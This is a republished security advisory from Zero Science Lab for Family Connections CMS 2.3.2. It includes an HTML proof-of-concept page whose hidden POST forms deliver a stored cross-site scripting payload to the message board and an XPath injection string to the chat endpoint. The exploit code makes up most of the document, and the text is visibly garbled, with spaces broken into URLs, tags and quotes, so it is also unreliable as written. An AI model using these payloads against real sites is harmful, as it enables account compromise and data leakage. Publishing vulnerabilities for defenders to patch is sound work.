Family Connections is an open-source content management system that allows you to easily and conveniently create private home sites. The storage-type cross-site and XPath injection vulnerabilities in Family Connections 2.3.2 may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
Vendor: Ryan Haudenschilt
Product web page: http://www.familycms.com
Affected version: 2.3.2
Vulnerability discovered by Gjoko LiquidWorm Krstic
Liquidworm gmail com
Zero Science Lab-http://www.zeroscience.mk
[+] Poc:
~~~~~~~~~
View source
Print?
01
02 <title> Family Connections CMS 2.3.2 Stored XSS And XPath Injection </title>
03 <body bgcolor = "# 1C1C1C">
04 <script type = "text/javascript">
05 function xpath () {document. forms ["xpath"]. submit ();}
06 function xss () {document. forms ["xss"]. submit ();}
07 </script>
08 <form action = "http: // FCMS/inc/getChat. php "enctype =" application/x-www-form-urlencoded "method =" POST "id =" xpath ">
09 <input type = "hidden" name = "message" value = "\; -- \"; -- "/> </form>
10 <a href = "javascript: xpath ();" style = "text-decoration: none">
11 <B> <font color = "red"> <center>
12 <form action = "http: // FCMS/messageboard. php" enctype = "application/x-www-form-urlencoded" method = "POST" id = "xss">
13 <input type = "hidden" name = "subject" value = "> <script> alert (1) </script>/>
14 <input type = "hidden" name = "post" value = "waddup"/>
15 <input type = "hidden" name = "name" value = "1"/>
16 <input type = "hidden" name = "post_submit" value = "Submit"/> </form>
17 <a href = "javascript: xss ();" style = "text-decoration: none">
18 <B> <font color = "red"> <center>
19 </body>
[+] Reference:
~~~~~~~~~
Http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php